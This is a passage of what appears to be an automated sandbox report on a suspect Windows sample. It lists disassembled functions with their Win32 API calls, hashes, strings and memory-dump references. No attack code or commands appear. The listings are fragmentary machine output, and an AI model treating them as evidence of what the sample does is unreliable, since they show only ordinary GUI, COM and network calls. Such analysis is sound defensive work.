                                                                                                                            • API String ID: 3096461208-0
                                                                                                                            • Opcode ID: a5172204bbe8b1f61bda8538a9f0d255c38f7c9b3e9928ec7e74e3d1b7179ae5
                                                                                                                            • Instruction ID: 82f504fec960139547a6b606f787f5e1bb495d80a729cbe3ad4a40b37fe0b607
                                                                                                                            • Opcode Fuzzy Hash: a5172204bbe8b1f61bda8538a9f0d255c38f7c9b3e9928ec7e74e3d1b7179ae5
                                                                                                                            • Instruction Fuzzy Hash: 54510D71B00205AFDB18CFA9DD99BBEBBBAEB88711F14813DF515D62A0D7709E418B10
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C12036,?,00000000,?,?,?,?,00C116CB,00000000,?), ref: 00C11B9A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C120D3
                                                                                                                            • KillTimer.USER32(-00000001,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C1216E
                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00C4BCA6
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BCD7
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BCEE
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BD0A
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C4BD1C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 641708696-0
                                                                                                                            • Opcode ID: 715fa9269b68a9156ad69f365eb36e9cadaaaa4f1241848e88e9628df2cd3b98
                                                                                                                            • Instruction ID: 24f79d6f68c319f62b6e8cd6432ac928e95babac0462a13d0fa32d95f7bee595
                                                                                                                            • Opcode Fuzzy Hash: 715fa9269b68a9156ad69f365eb36e9cadaaaa4f1241848e88e9628df2cd3b98
                                                                                                                            • Instruction Fuzzy Hash: 6A619B34501A00DFCB359F15DD88B69B7F2FB45312F20856EE5528AAA4C770ADA1FB80
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00C121D3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ColorLongWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 259745315-0
                                                                                                                            • Opcode ID: 0f5a5100391e214a41a6ed6bba0a954dd5240204ce46844e49e14e61be8f14bf
                                                                                                                            • Instruction ID: 85a49d7e060e94c0bea44fd2aa3933d770899632d10ff960970d089abf637bf8
                                                                                                                            • Opcode Fuzzy Hash: 0f5a5100391e214a41a6ed6bba0a954dd5240204ce46844e49e14e61be8f14bf
                                                                                                                            • Instruction Fuzzy Hash: C2418F35100140EBDB255F28EC88BFD3B65EB47331F28426AFE658A1E5C7318D92EB61
                                                                                                                            APIs
                                                                                                                            • CharLowerBuffW.USER32(?,?,00C9F910), ref: 00C7A90B
                                                                                                                            • GetDriveTypeW.KERNEL32(00000061,00CC89A0,00000061), ref: 00C7A9D5
                                                                                                                            • _wcscpy.LIBCMT ref: 00C7A9FF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                            • API String ID: 2820617543-1000479233
                                                                                                                            • Opcode ID: 311cf33a15cfc07324f84884da4605c7eccf3236122ef4b6f88240f7c3a6ddba
                                                                                                                            • Instruction ID: ca95541d658f73b23627103ebd55a48fe4c487ad4d4c735071c4787c610e3743
                                                                                                                            • Opcode Fuzzy Hash: 311cf33a15cfc07324f84884da4605c7eccf3236122ef4b6f88240f7c3a6ddba
                                                                                                                            • Instruction Fuzzy Hash: 8751AE311183019BC704EF14D8A2AAFB7A5EFC5710F14882DF59A972A2DB31DA49EB53
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __i64tow__itow__swprintf
                                                                                                                            • String ID: %.15g$0x%p$False$True
                                                                                                                            • API String ID: 421087845-2263619337
                                                                                                                            • Opcode ID: ea59a2f2efd1a7f79f552cb317388d034e80b13174321bfa2a7fd060156a199c
                                                                                                                            • Instruction ID: 90a6e7e6cf254e6cfe04e144b4a681ba34e2067811ab712a96235cc840c984a0
                                                                                                                            • Opcode Fuzzy Hash: ea59a2f2efd1a7f79f552cb317388d034e80b13174321bfa2a7fd060156a199c
                                                                                                                            • Instruction Fuzzy Hash: BA41E671510205AFEB24DF35D852EBAB7F8FF46300F20447EE559D7291EA319A42EB10
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C9716A
                                                                                                                            • CreateMenu.USER32 ref: 00C97185
                                                                                                                            • SetMenu.USER32(?,00000000), ref: 00C97194
                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C97221
                                                                                                                            • IsMenu.USER32(?), ref: 00C97237
                                                                                                                            • CreatePopupMenu.USER32 ref: 00C97241
                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C9726E
                                                                                                                            • DrawMenuBar.USER32 ref: 00C97276
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                            • String ID: 0$F
                                                                                                                            • API String ID: 176399719-3044882817
                                                                                                                            • Opcode ID: 8bb907e3f842f75661f522204bb4e4e5bc08cbaa0c3068452ccc0e8385d14ae6
                                                                                                                            • Instruction ID: 6ea67be89d96d979000809f5546716ebfc17d6ba7230bd5a62b1c353d4564f31
                                                                                                                            • Opcode Fuzzy Hash: 8bb907e3f842f75661f522204bb4e4e5bc08cbaa0c3068452ccc0e8385d14ae6
                                                                                                                            • Instruction Fuzzy Hash: F6414574A22205EFDF20DFA4D888F9ABBB5FF09310F14016AF915A7361D731AA10DB90
                                                                                                                            APIs
                                                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C9755E
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00C97565
                                                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C97578
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C97580
                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C9758B
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00C97594
                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00C9759E
                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C975B2
                                                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C975BE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                            • String ID: static
                                                                                                                            • API String ID: 2559357485-2160076837
                                                                                                                            • Opcode ID: 0501e6fa4cde407aec0579cb464ded310686be230a5663a36c3fece06d3736b3
                                                                                                                            • Instruction ID: dc14745a7dddd301b5834db2ea5fd10c4d3492422d18e9daf2b1e6ac919f5397
                                                                                                                            • Opcode Fuzzy Hash: 0501e6fa4cde407aec0579cb464ded310686be230a5663a36c3fece06d3736b3
                                                                                                                            • Instruction Fuzzy Hash: 54314972115215ABDF129F64DC0DFDA3B69EF09320F16422AFA25D60A0C731D922DBA4
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C36E3E
                                                                                                                              • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00C36ED7
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00C36F0D
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00C36F2A
                                                                                                                            • __allrem.LIBCMT ref: 00C36F80
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C36F9C
                                                                                                                            • __allrem.LIBCMT ref: 00C36FB3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C36FD1
                                                                                                                            • __allrem.LIBCMT ref: 00C36FE8
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C37006
                                                                                                                            • __invoke_watson.LIBCMT ref: 00C37077
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 384356119-0
                                                                                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                            • Instruction ID: 39d58285309a8225afa1539621e628fc408ee6ae77fd11c2fb0ef0128713b281
                                                                                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                            • Instruction Fuzzy Hash: DE7117B6A10717BBD728EF68DC81B5AB7B8BF04324F148229F524D7281E770DE049B90
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C72542
                                                                                                                            • GetMenuItemInfoW.USER32(00CD5890,000000FF,00000000,00000030), ref: 00C725A3
                                                                                                                            • SetMenuItemInfoW.USER32(00CD5890,00000004,00000000,00000030), ref: 00C725D9
                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00C725EB
                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00C7262F
                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00C7264B
                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00C72675
                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00C726BA
                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C72700
                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C72714
                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C72735
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4176008265-0
                                                                                                                            • Opcode ID: 47beee526d3ac0ed6a0513287b34231cc4d0829dca291e3945811f5c63b833b7
                                                                                                                            • Instruction ID: ffd3ce9ddfb44e63c29987fca832b21150604a1e332b86dbe0d8493da0be9eef
                                                                                                                            • Opcode Fuzzy Hash: 47beee526d3ac0ed6a0513287b34231cc4d0829dca291e3945811f5c63b833b7
                                                                                                                            • Instruction Fuzzy Hash: 8061BF70900249AFDF25CF64DD88EBEBBB8FB05304F14805AF865A3251D731AE46EB20
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C96FA5
                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C96FA8
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C96FCC
                                                                                                                            • _memset.LIBCMT ref: 00C96FDD
                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C96FEF
                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C97067
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$LongWindow_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 830647256-0
                                                                                                                            • Opcode ID: 45d5fc8fae6c617b55fc5253d04ce0636e12956d12d89454b8b309a38e2e5baf
                                                                                                                            • Instruction ID: 405f1b5d1f7a464833edfea3e48507653b656475ffa52ff7a75a2c5201292ebc
                                                                                                                            • Opcode Fuzzy Hash: 45d5fc8fae6c617b55fc5253d04ce0636e12956d12d89454b8b309a38e2e5baf
                                                                                                                            • Instruction Fuzzy Hash: 22615A75900208AFDB11DFA4CC85FEE77B8EB09710F14419AFA15AB2A1C771AE45DB90
                                                                                                                            APIs
                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C66BBF
                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00C66C18
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C66C2A
                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C66C4A
                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00C66C9D
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C66CB1
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C66CC6
                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00C66CD3
                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C66CDC
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C66CEE
                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C66CF9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2706829360-0
                                                                                                                            • Opcode ID: 69d63e23818040fab0f79401b62b3c953e5cfd533f42eba68dd90f6fc2fd3f7c
                                                                                                                            • Instruction ID: 6719e8a3cf979ddbcc031151d6057daf3f4377c2eb6b7983b676beb900744bc0
                                                                                                                            • Opcode Fuzzy Hash: 69d63e23818040fab0f79401b62b3c953e5cfd533f42eba68dd90f6fc2fd3f7c
                                                                                                                            • Instruction Fuzzy Hash: 36414475A00119AFCF10DF65D888AEEBBB9EF48354F008069E955E7261CB30EA46DF90
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                                                                              • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                                                                            • CoInitialize.OLE32 ref: 00C88403
                                                                                                                            • CoUninitialize.OLE32 ref: 00C8840E
                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00CA2BEC,?), ref: 00C8846E
                                                                                                                            • IIDFromString.OLE32(?,?), ref: 00C884E1
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C8857B
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C885DC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                            • API String ID: 834269672-1287834457
                                                                                                                            • Opcode ID: cc6b72848ff730eb20722c3bc70aed135746e09faae2076b736458f91b5dbcea
                                                                                                                            • Instruction ID: 0327b81276999b9a79c8ecd8848670e6f74af6ebab5751058ed433c3b972f514
                                                                                                                            • Opcode Fuzzy Hash: cc6b72848ff730eb20722c3bc70aed135746e09faae2076b736458f91b5dbcea
                                                                                                                            • Instruction Fuzzy Hash: E061BD716083129FD710EF14C858F6EB7E8AF86718F40481DF9829B691CB70EE48DB96
                                                                                                                            APIs
                                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00C85793
                                                                                                                            • inet_addr.WSOCK32(?,?,?), ref: 00C857D8
                                                                                                                            • gethostbyname.WSOCK32(?), ref: 00C857E4
                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 00C857F2
                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C85862
                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C85878
                                                                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C858ED
                                                                                                                            • WSACleanup.WSOCK32 ref: 00C858F3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                            • String ID: Ping
                                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                                            • Opcode ID: 0bab2173461ba5b8aa5e59b0a6b3e1df13779c108a2a42302922ff0479bb8a9f
                                                                                                                            • Instruction ID: 1eed7e33e6dc99007f84f3ad88ee55f717e54cb4ba4a1d9f3b3db12cfe071cab
                                                                                                                            • Opcode Fuzzy Hash: 0bab2173461ba5b8aa5e59b0a6b3e1df13779c108a2a42302922ff0479bb8a9f
                                                                                                                            • Instruction Fuzzy Hash: 3D51BE31644600DFDB20EF25CC89B6A77E4EF49314F04852AF966DB2E1DB70E941EB46
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C7B4D0
